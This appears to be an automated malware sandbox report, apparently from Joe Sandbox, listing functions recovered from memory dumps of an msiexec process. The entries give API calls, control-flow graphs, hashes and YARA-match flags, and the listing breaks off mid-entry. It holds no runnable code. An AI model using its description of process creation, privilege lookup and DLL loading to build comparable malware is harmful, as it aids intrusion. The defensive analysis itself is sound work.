                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540213481.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_4d60000_msiexec.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: bd26814e8820f406288e5b0d96cff57e32617d77d47b6f2719c0d68d151f6d12
                                                                                                                                                                                                        • Instruction ID: ce8a51e02419a2b43512bfc94cac4adb13997552c5af4f8d0f52cd5a12ee5755
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd26814e8820f406288e5b0d96cff57e32617d77d47b6f2719c0d68d151f6d12
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A590027124108806F510619D840474A001697D4345F55C411A4415668D86D5D8D17161
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04DC9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540213481.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_4d60000_msiexec.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 27c2ff423447fca76aaa7f5340b963e6ff676b839880eb7b66bbd2d825e0302c
                                                                                                                                                                                                        • Instruction ID: 06e8d1ee69851390b022f753424ceedeea5937c66021afb94db883384ba6c8e0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27c2ff423447fca76aaa7f5340b963e6ff676b839880eb7b66bbd2d825e0302c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B190027135114406F510619D8404706001697D5245F51C411A0815568D86D5D8D17162
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04DC9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540213481.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_4d60000_msiexec.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 73d697499a8cc8959e112ec4e4d4bf95bb08ddbdb16986db60606c956f203054
                                                                                                                                                                                                        • Instruction ID: 79f8916288bdf9f7100a3a4a5e1b425d0f54ced0e09dcff444c6fe1add4e30c7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73d697499a8cc8959e112ec4e4d4bf95bb08ddbdb16986db60606c956f203054
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB90026925300006F580719D540860A001697D5246F91D415A0006568CC955D8A96361
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04DC9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540213481.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_4d60000_msiexec.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 8401e58902cceaefbaac57aa08a55e7232495d5c08e1483f0a6381da90b98c95
                                                                                                                                                                                                        • Instruction ID: 3d5a79c6da216192819566169a0731eea4bc4037af8410d8a0146b03cb1a4027
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8401e58902cceaefbaac57aa08a55e7232495d5c08e1483f0a6381da90b98c95
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F890027124100406F50065DD5408646001697E4345F51D011A5015565EC6A5D8D17171
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04DC9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540213481.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_4d60000_msiexec.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: d19747d50ee363dd74c549ea44d0b2ac888f505ad47d22ceaeaad69f386da6b1
                                                                                                                                                                                                        • Instruction ID: 1803757d0e66a41d04b2ab738def62341160e20d2f65409e36426ab95eaa6f6a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d19747d50ee363dd74c549ea44d0b2ac888f505ad47d22ceaeaad69f386da6b1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F900261282041567945B19D44045074017A7E4285B91C012A1405960C8566E896E661
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04DC9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540213481.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_4d60000_msiexec.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 1604c3b526b467299772ad800cf75b7537a049ea86aaaf0d8dc096ef1471e340
                                                                                                                                                                                                        • Instruction ID: 49651fed67d1eab28aa967d22ed4f91f9afa02886ec9c8256002513aaaa9af57
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1604c3b526b467299772ad800cf75b7537a049ea86aaaf0d8dc096ef1471e340
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB90027124100417F511619D4504707001A97D4285F91C412A0415568D9696D992B161
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04DC99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540213481.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_4d60000_msiexec.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 598219b248dce314512aacdf33eee88fa00d70f53d4b4b33365560fc9c24ee13
                                                                                                                                                                                                        • Instruction ID: acd7dbe5d81f1b632df47637984c60f63cf156f674cb709d45275bf1d0e7b79b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 598219b248dce314512aacdf33eee88fa00d70f53d4b4b33365560fc9c24ee13
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 759002A138100446F500619D4414B060016D7E5345F51C015E1055564D8659DC927166
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04DC9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540213481.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_4d60000_msiexec.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 6926edbd1410c2f6bd09aaba668ded2dda828ebebb41312ff641c5b3849af42c
                                                                                                                                                                                                        • Instruction ID: ae5b27acf9a8063b0bb74b7b570e4ded84b9dc69a0554aa4af99bd1d8ba8d320
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6926edbd1410c2f6bd09aaba668ded2dda828ebebb41312ff641c5b3849af42c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 289002B124100406F540719D4404746001697D4345F51C011A5055564E8699DDD576A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04DC9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.539545866.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540213481.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000F.00000002.540224978.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_4d60000_msiexec.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: f0be23fa9f8deb070116005f2e380052cf2cac18f6e180b4a6beedf5506540f6
                                                                                                                                                                                                        • Instruction ID: 90987e8036c4fb0fa9d031960ed373b1fc388ca342a6da28bc165ee297c6675e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0be23fa9f8deb070116005f2e380052cf2cac18f6e180b4a6beedf5506540f6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0690026125180046F60065AD4C14B07001697D4347F51C115A0145564CC955D8A16561
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E89030 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 297 e89030-e8905f 298 e8906b-e89072 297->298 299 e89066 call e8be60 297->299 300 e89078-e890c8 call e8bf30 call e7a140 call e85aa0 298->300 301 e8914c-e89152 298->301 299->298 308 e890d0-e890e1 Sleep 300->308 309 e890e3-e890e9 308->309 310 e89146-e8914a 308->310 311 e890eb-e89111 call e88c60 309->311 312 e89113-e89133 309->312 310->301 310->308 314 e89139-e8913c 311->314 312->314 315 e89134 call e88e60 312->315 314->310 315->314
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 00E890D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                                                                                                        • Opcode ID: aa3a8e84b3907601b07336ff840b7603f3769f0f815c8c2fc2cc23faf0a507ac
                                                                                                                                                                                                        • Instruction ID: f77956f8c91603fca46fb4cf5758a6918ba2f21bccf5274e61ad6e757bbb026d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa3a8e84b3907601b07336ff840b7603f3769f0f815c8c2fc2cc23faf0a507ac
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA3181B2502705ABD725EF64CCA5FA7B7F8AF48704F14811DF61E6B242D770A405CBA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E89026 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 317 e89026-e89072 call e8be60 320 e89078-e890c8 call e8bf30 call e7a140 call e85aa0 317->320 321 e8914c-e89152 317->321 328 e890d0-e890e1 Sleep 320->328 329 e890e3-e890e9 328->329 330 e89146-e8914a 328->330 331 e890eb-e89111 call e88c60 329->331 332 e89113-e89133 329->332 330->321 330->328 334 e89139-e8913c 331->334 332->334 335 e89134 call e88e60 332->335 334->330 335->334
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 00E890D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                                                                                                        • Opcode ID: 50aff041e8ecc88a94eb05235104dfeb98f754e40cc701ea6d8947b86c24e99b
                                                                                                                                                                                                        • Instruction ID: 30dfff09fd6f9d1bae54e19db339ebe4830ff6cbe6613730aaf8a6f6e044148b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 50aff041e8ecc88a94eb05235104dfeb98f754e40cc701ea6d8947b86c24e99b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66218DB1A02705ABD721EF64C8E5FABBBB4EF88704F148119F61DAB242D770A445CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E77679 Relevance: 3.1, APIs: 2, Instructions: 59threadwindowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 337 e77679-e7768f 339 e77698-e776ca call e8cb60 call e7a140 call e85aa0 337->339 340 e77693 call e8bf80 337->340 347 e776fe-e77702 339->347 348 e776cc-e776de PostThreadMessageW 339->348 340->339 349 e776e0-e776fb call e798a0 PostThreadMessageW 348->349 350 e776fd 348->350 349->350 350->347
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00E776DA
                                                                                                                                                                                                        • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 00E776FB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                                                                        • Opcode ID: 2c9f3c23f989586b710b592f43532244a2e22982f6d7a2a10d22f946bce5b3ba
                                                                                                                                                                                                        • Instruction ID: 2cc47296d2cd7242bfd4514b12d701edfac2a976e49259d79d9c218dfd30cae6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c9f3c23f989586b710b592f43532244a2e22982f6d7a2a10d22f946bce5b3ba
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8201F931A807197BE721B6949C43FEE776CAF41B50F144118FB08BA1C1E7D4690587E6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E77680 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00E776DA
                                                                                                                                                                                                        • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 00E776FB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                                                                        • Opcode ID: 25af1c734532a81ca7ba9eb524d0be4fa31931f0d13e5fbae633e88c13e8d855
                                                                                                                                                                                                        • Instruction ID: 99afc8ff9fbb80a758591a024728b5db70a3f5991002cd51cb1ccc7ff608b096
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25af1c734532a81ca7ba9eb524d0be4fa31931f0d13e5fbae633e88c13e8d855
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B018431A8062877E721A6959C43FBE776C9F41B50F544118FB08BA1C1EB94690647EA
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E7A140 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 563 e7a140-e7a169 call e8cdb0 566 e7a16f-e7a17d call e8d1d0 563->566 567 e7a16b-e7a16e 563->567 570 e7a17f-e7a18a call e8d450 566->570 571 e7a18d-e7a19e call e8b500 566->571 570->571 576 e7a1b7-e7a1ba 571->576 577 e7a1a0-e7a1b4 LdrLoadDll 571->577 577->576
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E7A1B2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Load
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                                                                                        • Opcode ID: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                                                                                                                                                                                        • Instruction ID: 1cbb3bf6424b0351f5da7bb30f83ba4946c176bcbf0bdf0ccd274199d0ff99f0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D011EB5E0120DABDF10EBE4DC42FDEB7B89B54708F0481A5A90CA7281F631EB14CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E8A690 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 578 e8a690-e8a6e8 call e8af60 CreateProcessInternalW
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 00E8A6E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2186235152-0
                                                                                                                                                                                                        • Opcode ID: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                                                                                                                                                                                        • Instruction ID: 5358da96b72b1d834e8b6446be246889f1db8e4c3c68eba5e28cc811c07da934
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3601B2B2210108BFCB54DF89DC80EEB77EDAF8C754F158258BA0DA7241C630E851CBA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E89160 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 587 e89160-e89188 call e85aa0 590 e8918a-e891a6 call e8f3af CreateThread 587->590 591 e891a7-e891ac 587->591
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00E7D2F0,?,?), ref: 00E8919C
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                                                        • Opcode ID: 16809be654502e1535f31eed24f698d23d9c723d2a2eeed363768dc1ccac579f
                                                                                                                                                                                                        • Instruction ID: 003571e5817e1472e150d010ff25270f5e86e10099d57240543a35b600707394
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16809be654502e1535f31eed24f698d23d9c723d2a2eeed363768dc1ccac579f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BAE06D337C17043BE22061A99C42FA7B38C9B80B20F55006AFA0DEB2C1D991F80102A4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E8A773 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E7D5C2,00E7D5C2,?,00000000,?,?), ref: 00E8A7B0
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_e70000_msiexec.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                                                                        • Opcode ID: 8a41b7d9d889440b63d36c6aa00e701aa8a93c638513acde9aed31a4fbae3f58
                                                                                                                                                                                                        • Instruction ID: 82826d033970444e66422d8fa05d1e95979c85ebfeb14eb2b200ee069bb4f3a4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a41b7d9d889440b63d36c6aa00e701aa8a93c638513acde9aed31a4fbae3f58
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9DF0A0B12402086FCB10DF54CC41ED73BB9EF45250F108198FD4DA7242C230E8158BE1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00E7DA28 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00E78233,?), ref: 00E7DA5B
                                                                                                                                                                                                        Memory Dump Source
